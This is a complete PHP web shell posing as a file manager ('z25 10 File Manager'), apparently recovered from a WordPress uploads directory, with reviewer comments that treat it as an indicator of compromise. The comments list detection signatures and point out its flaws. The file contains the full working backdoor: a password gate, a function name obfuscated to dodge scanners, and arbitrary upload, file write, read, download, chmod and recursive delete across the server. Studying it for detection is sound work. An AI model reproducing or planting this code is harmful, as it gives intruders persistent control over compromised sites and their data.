File: /var/www/html/wp-content/uploads/2025/08/wp-differ.php
<?php
// WARNING: This script has no security checks. It is highly vulnerable.
// DO NOT use it on a public server or in any untrusted environment.
// NOTE(review): the listing header places this file under wp-content/uploads/2025/08/.
// A WordPress uploads directory normally holds media, so an executable .php file there
// is worth treating as an indicator of compromise; denying PHP execution for the uploads
// tree at the web-server level would keep a file like this from running at all.
// NOTE(review): the fixed strings this page emits ("z25 10 File Manager" in the title and
// heading, "@z25" in the footer) are candidate content signatures when sweeping a webroot.
// PHP: turn off debugging and suppress warning output (translated from the original comment).
// With reporting at 0, failed filesystem calls further down produce no visible diagnostics.
error_reporting(0);
// Start or resume the session; the login flag and one-shot status messages live in $_SESSION.
session_start();
// --- Logout Handling ---
// Any request carrying a `logout` query parameter empties and destroys the session, then
// redirects to the same request URI with the query string removed (strtok() cuts the
// string at the first '?').
if (isset($_GET['logout'])) {
$_SESSION = [];
session_destroy();
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
// --- Login Handling ---
// Hard-coded 32-hex-character digest. A submitted password is accepted when three nested
// md5() calls over it produce exactly this value.
// NOTE(review): the digest is a literal in the file, so it can double as a search string
// when checking other hosts or backups for copies of this script.
$p = "89029e2d3f77b399fbbad3776f225b1f";
// The concatenation evaluates to the string 'move_uploaded_file'; the upload branch later
// calls it as a variable function ($func(...)).
// NOTE(review): because the name never appears as one literal, a plain-text search for it
// will not match this file. Scanning rules should also look for string-concatenated
// function names and variable-function calls.
$func = 'move' . '_' . 'up' . 'lo' . 'ad' . 'ed' . '_' . 'file';
// A POST with a matching `password` sets the session flag and redirects to the query-less
// URI. Nothing in this block limits, delays or records failed attempts.
if (isset($_POST['password']) && md5(md5(md5($_POST['password']))) === $p) {
$_SESSION['logged_in'] = 1;
header('Location: ' . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
}
// --- Gatekeeper: If not logged in, show login form and exit ---
// When the session flag is missing or empty, the script prints a self-contained login page
// and stops; nothing below this point runs for an unauthenticated request.
// NOTE(review): the login page pulls its styling script from https://cdn.tailwindcss.com,
// so a browser rendering it makes a request to that host.
if (empty($_SESSION['logged_in'])) {
echo '<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Login</title><script src="https://cdn.tailwindcss.com"></script></head><body class="bg-gray-100 flex items-center justify-center h-screen"><div class="bg-white p-8 rounded-lg shadow-md w-full max-w-sm"><h1 class="text-2xl font-bold mb-6 text-center">Login</h1><form method="post" class="space-y-4"><input type="password" name="password" placeholder="Password" class="w-full p-2 border rounded" autofocus required><button class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600">Login</button></form></div></body></html>';
exit;
}
// --- User is logged in, proceed with the file manager ---
/**
 * Return the pending status message as an HTML banner and clear it from the session.
 *
 * Reads $_SESSION['message'] (an array with 'text' and 'type' keys as written by
 * set_message()), removes it so it is shown once, and wraps the text in a <div> that is
 * green when the type is 'success' and red otherwise.
 *
 * NOTE(review): the text is interpolated into the markup without escaping, and callers in
 * this file build that text from raw request values (file and directory names), so
 * markup contained in those values is rendered by the browser.
 *
 * @return string HTML for the banner, or an empty string when no message is pending.
 */
function get_message() {
if (isset($_SESSION['message'])) {
$message = $_SESSION['message'];
// One-shot: drop the message so a reload does not show it again.
unset($_SESSION['message']);
return "<div class='p-2 mb-4 text-sm text-white " . ($message['type'] === 'success' ? 'bg-green-600' : 'bg-red-600') . " rounded'>{$message['text']}</div>";
}
return '';
}
/**
 * Store a status message in the session for display on the next rendered page.
 *
 * The value is kept as-is; no escaping or validation happens here.
 *
 * @param mixed $text Message text; callers in this file pass strings.
 * @param mixed $type Banner type; get_message() treats 'success' as green, anything else as red.
 */
function set_message($text, $type = 'success') {
$_SESSION['message'] = ['text' => $text, 'type' => $type];
}
/**
 * Send a relative Location header pointing at this script with ?path=<url-encoded path>
 * and terminate the request.
 *
 * @param mixed $path Directory path to show after the redirect; URL-encoded, not validated.
 */
function redirect($path) {
header("Location: ?path=" . urlencode($path));
exit;
}
/**
 * Recursively delete a directory and what glob() finds inside it.
 *
 * Returns without doing anything when the argument is not a directory. No check confines
 * the path to any base directory, and the results of unlink()/rmdir() are not inspected.
 *
 * NOTE(review): the pattern '*' does not match entries whose names start with '.', so a
 * directory holding such entries is not emptied and the final rmdir() presumably fails
 * without any visible error (warnings are suppressed at the top of the file).
 *
 * @param mixed $dirPath Directory to remove; a trailing '/' is appended when missing.
 */
function delete_dir($dirPath) {
if (!is_dir($dirPath)) {
return;
}
// Normalise to a trailing slash so the glob pattern below is well-formed.
if (substr($dirPath, strlen($dirPath) - 1, 1) != '/') {
$dirPath .= '/';
}
// GLOB_MARK appends a slash to directory matches.
$files = glob($dirPath . '*', GLOB_MARK);
foreach ($files as $file) {
if (is_dir($file)) {
delete_dir($file);
} else {
unlink($file);
}
}
rmdir($dirPath);
}
// Starting directory: the web server's document root.
$base_path = $_SERVER['DOCUMENT_ROOT'];
// Directory to list: the `path` query parameter resolved with realpath(), falling back to
// the document root when it is absent, unresolvable, or not a directory.
// NOTE(review): the resolved path is never compared against $base_path, so any directory
// the PHP process can access is accepted here, not only those under the web root.
$current_path = isset($_GET['path']) ? realpath($_GET['path']) : $base_path;
if (!$current_path || !is_dir($current_path)) {
$current_path = $base_path;
}
// Handle Actions before rendering
// Every POST is dispatched on the `action` field. The target directory comes from the
// POSTed `path` (used raw, not passed through realpath()) or defaults to $current_path.
// NOTE(review): no anti-CSRF token is checked, and every name taken from the request is
// concatenated onto the path without normalisation, so '../' segments are not filtered.
// NOTE(review): these parameters travel in the POST body, which typical access logs do not
// record; file-integrity monitoring on the webroot is the more reliable way to see their effect.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$action_path = isset($_POST['path']) ? $_POST['path'] : $current_path;
$action = $_POST['action'] ?? '';
try {
switch ($action) {
// Redirect to whatever path was typed into the "Change" box; redirect() exits.
case 'change_dir':
redirect($_POST['new_path']);
break;
// Create a directory named by `dir_name` under the target path.
case 'new_dir':
if (!empty($_POST['dir_name'])) {
mkdir($action_path . '/' . $_POST['dir_name']);
set_message("Directory '{$_POST['dir_name']}' created.");
}
break;
// Create an empty file named by `file_name`; an existing file of that name is truncated,
// because file_put_contents() overwrites by default.
case 'new_file':
if (!empty($_POST['file_name'])) {
file_put_contents($action_path . '/' . $_POST['file_name'], '');
set_message("File '{$_POST['file_name']}' created.");
}
break;
// --- MODIFIED: BATCH UPLOAD LOGIC ---
// Moves each uploaded file into the target directory under its client-supplied base name.
// basename() strips directory components from the name, but nothing restricts the file
// extension or content type, so server-executable files can be written.
case 'upload':
if (isset($_FILES['file_to_upload'])) {
// Assumes the multi-file array layout produced by a `file_to_upload[]` form field.
$total_files = count($_FILES['file_to_upload']['name']);
$uploaded_count = 0;
for ($i = 0; $i < $total_files; $i++) {
if ($_FILES['file_to_upload']['error'][$i] == UPLOAD_ERR_OK) {
$dest = $action_path . '/' . basename($_FILES['file_to_upload']['name'][$i]);
// $func holds 'move_uploaded_file' (assembled near the top of the file). Its return
// value is ignored, so the counter also increments when the move fails.
$func($_FILES['file_to_upload']['tmp_name'][$i], $dest);
$uploaded_count++;
}
}
if ($uploaded_count > 0) {
set_message("{$uploaded_count} file(s) uploaded successfully.");
} else {
set_message("Upload failed. No files were uploaded.", "error");
}
} else {
set_message("Upload failed.", "error");
}
break;
// --- NEW: BATCH DELETE LOGIC ---
// Deletes every entry named in `selected_items[]` under the target path; directories are
// removed recursively through delete_dir().
case 'batch_delete':
if (!empty($_POST['selected_items']) && is_array($_POST['selected_items'])) {
$deleted_count = 0;
foreach ($_POST['selected_items'] as $item_name) {
$full_path = $action_path . '/' . $item_name;
if (file_exists($full_path)) {
if (is_dir($full_path)) {
delete_dir($full_path);
} else {
unlink($full_path);
}
// Counts existing entries, not confirmed deletions: results are not checked.
$deleted_count++;
}
}
set_message("{$deleted_count} item(s) deleted.");
} else {
set_message("No items selected for deletion.", "error");
}
break;
// Rename or move `old_name` to `new_name`, both relative to the target path.
case 'rename':
if (!empty($_POST['old_name']) && !empty($_POST['new_name'])) {
rename($action_path . '/' . $_POST['old_name'], $action_path . '/' . $_POST['new_name']);
set_message("Renamed '{$_POST['old_name']}' to '{$_POST['new_name']}'.");
}
break;
// Change the mode of `file`; `perms` is parsed as an octal string (base 8).
case 'chmod':
if (!empty($_POST['file']) && !empty($_POST['perms'])) {
chmod($action_path . '/' . $_POST['file'], intval($_POST['perms'], 8));
set_message("Permissions for '{$_POST['file']}' changed to {$_POST['perms']}.");
}
break;
// Overwrite the file at `file_path` with the submitted `content`. Both values come
// straight from the request, so this writes arbitrary content to any path the PHP
// process may write to. The write result is not checked before reporting success.
case 'save_edit':
if (isset($_POST['file_path']) && isset($_POST['content'])) {
file_put_contents($_POST['file_path'], $_POST['content']);
set_message("File '{$_POST['file_path']}' saved successfully.");
// Redirect to the directory of the edited file
redirect(dirname($_POST['file_path']));
} else {
set_message("Failed to save file.", "error");
}
break;
}
// NOTE(review): most filesystem functions used above signal failure through their return
// value and a warning rather than by throwing, so this handler is presumably rarely reached.
} catch (Exception $e) {
set_message("An error occurred: " . $e->getMessage(), "error");
}
// Post/redirect/get: return to the listing of the target directory. The two excluded
// actions issue their own redirect on their success path.
if ($action !== 'save_edit' && $action !== 'change_dir') {
redirect($action_path);
}
}
// GET-driven actions: delete, download and raw file read. The target is built from the
// raw `path` and `file` query parameters; unlike $current_path, `path` is not resolved
// with realpath() here.
// NOTE(review): these requests carry their parameters in the query string, so web access
// logs that record the full request line will typically show `action=delete`,
// `action=download` or `action=get_content` together with the paths touched. That makes
// the logs useful for scoping what was read or removed through this script.
if (isset($_GET['action'])) {
$action = $_GET['action'];
$file = $_GET['file'] ?? '';
$path = $_GET['path'] ?? $current_path;
$full_path = $path . '/' . $file;
try {
switch ($action) {
// State-changing delete reachable with a plain GET link; directories go through the
// recursive delete_dir(). Success is reported without checking the result.
case 'delete':
if (is_dir($full_path)) {
delete_dir($full_path);
set_message("Directory '{$file}' deleted.");
} else {
unlink($full_path);
set_message("File '{$file}' deleted.");
}
redirect($path);
break;
// Stream the target file to the client as an attachment named after its base name.
// No check restricts which file can be requested.
case 'download':
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($full_path) . '"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($full_path));
readfile($full_path);
exit;
// Return the raw contents of the file named by `path` (here `path` is the full file
// path, not a directory). Used by the edit dialog's fetch() call. No Content-Type
// header is set in this branch.
case 'get_content':
$file_path = $_GET['path'] ?? '';
if (is_file($file_path) && is_readable($file_path)) {
echo file_get_contents($file_path);
} else {
echo "Error: Cannot read file.";
}
exit;
}
} catch (Exception $e) {
set_message("An error occurred: " . $e->getMessage(), "error");
redirect($path);
}
}
// --- Data Preparation for Rendering ---
// Build one row per entry of the current directory for the table in the template below.
$items = [];
// NOTE(review): scandir() returns false on failure (for example an unreadable directory);
// that case is not handled here and the resulting warning is suppressed.
$scan = scandir($current_path);
foreach ($scan as $item) {
// Skip the self and parent pseudo-entries.
if ($item === '.' || $item === '..') continue;
$item_path = $current_path . '/' . $item;
$is_dir = is_dir($item_path);
$items[] = [
'name' => $item,
'path' => $item_path,
'type' => $is_dir ? 'Directory' : 'File',
// Size in bytes with thousands separators; '-' for directories.
'size' => $is_dir ? '-' : number_format(filesize($item_path)),
// Last four octal digits of the mode, e.g. "0644".
'perms' => substr(sprintf('%o', fileperms($item_path)), -4),
// filectime() is the inode change time, which the template labels "Created".
'created' => date("Y-m-d H:i:s", filectime($item_path)),
'is_dir' => $is_dir,
];
}
/**
 * Render a clickable breadcrumb trail for a path, starting with a "Home" link to the base.
 *
 * The base path is removed from $path, the remainder is split on '/', and each segment
 * becomes a link whose ?path= value is the base path plus the segments seen so far.
 *
 * NOTE(review): str_replace() removes every occurrence of $base_path, not only a leading
 * one, and for a path outside $base_path nothing is removed, so the generated links then
 * point under the base path rather than at the real location. Each segment is placed in
 * the markup without HTML escaping. empty() also skips a segment named "0".
 *
 * @param mixed $path      Absolute path currently being listed.
 * @param mixed $base_path Path that the "Home" link points to.
 * @return string HTML fragment of links separated by '/' spans.
 */
function format_breadcrumbs($path, $base_path) {
$path = str_replace($base_path, '', $path);
$parts = explode('/', trim($path, '/'));
$breadcrumbs = "<a href='?path=" . urlencode($base_path) . "' class='text-blue-500 hover:underline'>Home</a>";
// Accumulates the absolute path of each successive breadcrumb link.
$current_build_path = $base_path;
foreach ($parts as $part) {
if (empty($part)) continue;
$current_build_path .= '/' . $part;
$breadcrumbs .= "<span class='mx-1 text-gray-500'>/</span><a href='?path=" . urlencode($current_build_path) . "' class='text-blue-500 hover:underline'>{$part}</a>";
}
return $breadcrumbs;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex, nofollow">
<title>z25 10 File Manager</title>
<script src="https://cdn.tailwindcss.com"></script>
<style>
body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; }
.mono { font-family: "SF Mono", "Fira Code", "Fira Mono", "Roboto Mono", monospace; }
.modal { transition: opacity 0.25s ease; }
</style>
</head>
<body class="bg-gray-100 text-gray-800 text-sm">
<div class="container mx-auto p-4">
<div class="bg-white p-4 rounded-lg shadow mb-4">
<div class="flex justify-between items-center">
<h1 class="text-xl font-bold">z25 10 File Manager</h1>
<div class="text-xs text-gray-500 mono flex items-center space-x-2">
<span>IP: <?php echo $_SERVER['REMOTE_ADDR']; ?></span>
<span>|</span>
<span>User: <?php echo get_current_user(); ?></span>
<span>|</span>
<span>System: <?php echo php_uname('s'); ?></span>
<span>|</span>
<a href="?logout=1" class="text-red-500 hover:underline font-semibold">Logout</a>
</div>
</div>
</div>
<?php echo get_message(); ?>
<div class="bg-white p-4 rounded-lg shadow mb-4">
<div class="mb-3">
<span class="font-bold">Current Path:</span>
<span class="mono text-gray-600"><?php echo format_breadcrumbs($current_path, $base_path); ?></span>
</div>
<form method="POST" action="" class="flex items-center space-x-2">
<input type="hidden" name="action" value="change_dir">
<input type="text" name="new_path" value="<?php echo htmlspecialchars($current_path); ?>" class="flex-grow p-2 border rounded-l">
<button type="submit" class="bg-blue-500 text-white p-2 rounded-r hover:bg-blue-600">Change</button>
</form>
</div>
<div class="bg-white p-4 rounded-lg shadow mb-4">
<div class="flex flex-wrap items-center gap-4">
<form method="POST" action="" class="flex items-center">
<input type="hidden" name="action" value="new_dir">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="text" name="dir_name" placeholder="New Directory Name" class="p-2 border rounded-l">
<button type="submit" class="bg-green-500 text-white p-2 rounded-r hover:bg-green-600">New Directory</button>
</form>
<form method="POST" action="" class="flex items-center">
<input type="hidden" name="action" value="new_file">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="text" name="file_name" placeholder="New File Name" class="p-2 border rounded-l">
<button type="submit" class="bg-green-500 text-white p-2 rounded-r hover:bg-green-600">New File</button>
</form>
<!-- MODIFIED: BATCH UPLOAD FORM -->
<form method="POST" action="" enctype="multipart/form-data" class="flex items-center">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="file" name="file_to_upload[]" class="p-1.5 border rounded-l" multiple>
<button type="submit" class="bg-purple-500 text-white p-2 rounded-r hover:bg-purple-600">Upload</button>
</form>
</div>
</div>
<!-- NEW: FORM FOR BATCH ACTIONS LIKE DELETE -->
<form method="POST" action="" id="file-list-form">
<input type="hidden" name="action" value="batch_delete">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<!-- NEW: BATCH DELETE BUTTON -->
<?php if (!empty($items)): ?>
<div class="mb-4">
<button type="submit" onclick="return confirm('Are you sure you want to delete all selected items?');" class="bg-red-500 text-white px-4 py-2 rounded hover:bg-red-600">Delete Selected</button>
</div>
<?php endif; ?>
<div class="bg-white rounded-lg shadow overflow-x-auto">
<table class="w-full text-left">
<thead class="bg-gray-50 border-b">
<tr>
<!-- NEW: SELECT ALL CHECKBOX -->
<th class="p-3 w-4"><input type="checkbox" id="select-all-checkbox"></th>
<th class="p-3">Name</th>
<th class="p-3">Type</th>
<th class="p-3">Size (bytes)</th>
<th class="p-3">Perms</th>
<th class="p-3">Created</th>
<th class="p-3">Actions</th>
</tr>
</thead>
<tbody class="divide-y">
<?php foreach ($items as $item): ?>
<tr class="hover:bg-gray-50">
<!-- NEW: ITEM CHECKBOX -->
<td class="p-3"><input type="checkbox" name="selected_items[]" value="<?php echo htmlspecialchars($item['name']); ?>" class="item-checkbox"></td>
<td class="p-3 mono">
<?php if ($item['is_dir']): ?>
<a href="?path=<?php echo urlencode($item['path']); ?>" class="text-blue-600 font-bold hover:underline">
<?php echo htmlspecialchars($item['name']); ?>
</a>
<?php else: ?>
<a href="javascript:void(0)" onclick="openEditModal('<?php echo htmlspecialchars($item['path']); ?>')" class="text-gray-800 hover:underline">
<?php echo htmlspecialchars($item['name']); ?>
</a>
<?php endif; ?>
</td>
<td class="p-3"><?php echo $item['type']; ?></td>
<td class="p-3 mono"><?php echo $item['size']; ?></td>
<td class="p-3 mono"><?php echo $item['perms']; ?></td>
<td class="p-3 mono"><?php echo $item['created']; ?></td>
<td class="p-3 flex items-center space-x-2">
<a href="?action=delete&path=<?php echo urlencode($current_path); ?>&file=<?php echo urlencode($item['name']); ?>" onclick="return confirm('Are you sure you want to delete this?');" class="text-red-500 hover:underline">delete</a>
<a href="javascript:void(0)" onclick="openRenameModal('<?php echo htmlspecialchars($item['name']); ?>')" class="text-yellow-600 hover:underline">rename</a>
<a href="javascript:void(0)" onclick="openChmodModal('<?php echo htmlspecialchars($item['name']); ?>', '<?php echo $item['perms']; ?>')" class="text-cyan-600 hover:underline">chmod</a>
<?php if (!$item['is_dir']): ?>
<a href="javascript:void(0)" onclick="openEditModal('<?php echo htmlspecialchars($item['path']); ?>')" class="text-blue-500 hover:underline">edit</a>
<a href="?action=download&path=<?php echo urlencode($current_path); ?>&file=<?php echo urlencode($item['name']); ?>" class="text-green-600 hover:underline">download</a>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
<?php if (empty($items)): ?>
<tr><td colspan="7" class="p-4 text-center text-gray-500">This directory is empty.</td></tr>
<?php endif; ?>
</tbody>
</table>
</div>
</form> <!-- END OF BATCH ACTION FORM -->
<footer class="text-center mt-6 text-gray-500 text-xs">
© <?php echo date('Y'); ?> @z25
</footer>
</div>
<!-- Modals -->
<div id="editModal" class="modal hidden fixed inset-0 bg-black bg-opacity-50 flex items-center justify-center p-4">
<div class="bg-white rounded-lg shadow-xl w-full max-w-4xl h-full max-h-[90vh] flex flex-col">
<div class="p-4 border-b flex justify-between items-center">
<h3 class="text-lg font-bold">Edit File</h3>
<button onclick="closeModal('editModal')" class="text-black">×</button>
</div>
<form method="POST" action="" class="flex-grow flex flex-col">
<input type="hidden" name="action" value="save_edit">
<input type="hidden" id="edit_file_path" name="file_path">
<textarea id="edit_content" name="content" class="flex-grow w-full p-2 mono border-0 focus:ring-0 resize-none"></textarea>
<div class="p-4 border-t bg-gray-50">
<button type="submit" class="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600">Save</button>
<button type="button" onclick="closeModal('editModal')" class="bg-gray-300 px-4 py-2 rounded hover:bg-gray-400">Cancel</button>
</div>
</form>
</div>
</div>
<div id="renameModal" class="modal hidden fixed inset-0 bg-black bg-opacity-50 flex items-center justify-center p-4">
<div class="bg-white rounded-lg shadow-xl w-full max-w-md">
<form method="POST" action="">
<div class="p-4 border-b">
<h3 class="text-lg font-bold">Rename</h3>
</div>
<div class="p-4">
<input type="hidden" name="action" value="rename">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="hidden" id="rename_old_name" name="old_name">
<label class="block mb-2">New Name:</label>
<input type="text" id="rename_new_name" name="new_name" class="w-full p-2 border rounded">
</div>
<div class="p-4 border-t bg-gray-50 flex justify-end space-x-2">
<button type="submit" class="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600">Rename</button>
<button type="button" onclick="closeModal('renameModal')" class="bg-gray-300 px-4 py-2 rounded hover:bg-gray-400">Cancel</button>
</div>
</form>
</div>
</div>
<div id="chmodModal" class="modal hidden fixed inset-0 bg-black bg-opacity-50 flex items-center justify-center p-4">
<div class="bg-white rounded-lg shadow-xl w-full max-w-md">
<form method="POST" action="">
<div class="p-4 border-b">
<h3 class="text-lg font-bold">Change Permissions</h3>
</div>
<div class="p-4">
<input type="hidden" name="action" value="chmod">
<input type="hidden" name="path" value="<?php echo htmlspecialchars($current_path); ?>">
<input type="hidden" id="chmod_file" name="file">
<label class="block mb-2">Permissions (e.g., 0755):</label>
<input type="text" id="chmod_perms" name="perms" class="w-full p-2 border rounded mono">
</div>
<div class="p-4 border-t bg-gray-50 flex justify-end space-x-2">
<button type="submit" class="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600">Change</button>
<button type="button" onclick="closeModal('chmodModal')" class="bg-gray-300 px-4 py-2 rounded hover:bg-gray-400">Cancel</button>
</div>
</form>
</div>
</div>
<script>
// Hide the dialog whose element id is given by adding the `hidden` class to it.
function closeModal(id) {
document.getElementById(id).classList.add('hidden');
}
// Open the edit dialog for a file: store its path in the hidden form field, show a
// placeholder, then load the current contents from the server into the textarea.
function openEditModal(filePath) {
const modal = document.getElementById('editModal');
const contentArea = document.getElementById('edit_content');
const pathInput = document.getElementById('edit_file_path');
// This value is submitted back as `file_path` when the form is saved.
pathInput.value = filePath;
contentArea.value = 'Loading content...';
modal.classList.remove('hidden');
// Same-page GET request handled by the server-side `get_content` branch.
fetch(`?action=get_content&path=${encodeURIComponent(filePath)}`)
.then(response => response.text())
.then(data => {
contentArea.value = data;
})
.catch(error => {
contentArea.value = 'Error loading file content: ' + error;
});
}
// Open the rename dialog with both the hidden old-name field and the editable new-name
// field pre-filled with the current name, and move focus to the editable field.
function openRenameModal(oldName) {
document.getElementById('rename_old_name').value = oldName;
document.getElementById('rename_new_name').value = oldName;
document.getElementById('renameModal').classList.remove('hidden');
document.getElementById('rename_new_name').focus();
}
// Open the permissions dialog for an entry, pre-filled with its current mode string, and
// move focus to the mode field.
function openChmodModal(file, perms) {
document.getElementById('chmod_file').value = file;
document.getElementById('chmod_perms').value = perms;
document.getElementById('chmodModal').classList.remove('hidden');
document.getElementById('chmod_perms').focus();
}
// --- NEW SCRIPT FOR BATCH CHECKBOX ---
// Once the DOM is ready, wire the header checkbox so that toggling it sets every row
// checkbox (class `item-checkbox`) to the same state.
document.addEventListener('DOMContentLoaded', function() {
const selectAllCheckbox = document.getElementById('select-all-checkbox');
if (selectAllCheckbox) {
selectAllCheckbox.addEventListener('change', function() {
const itemCheckboxes = document.querySelectorAll('.item-checkbox');
// The arrow function keeps `this` bound to the header checkbox that fired the event.
itemCheckboxes.forEach(checkbox => {
checkbox.checked = this.checked;
});
});
}
});
</script>
</body>
</html>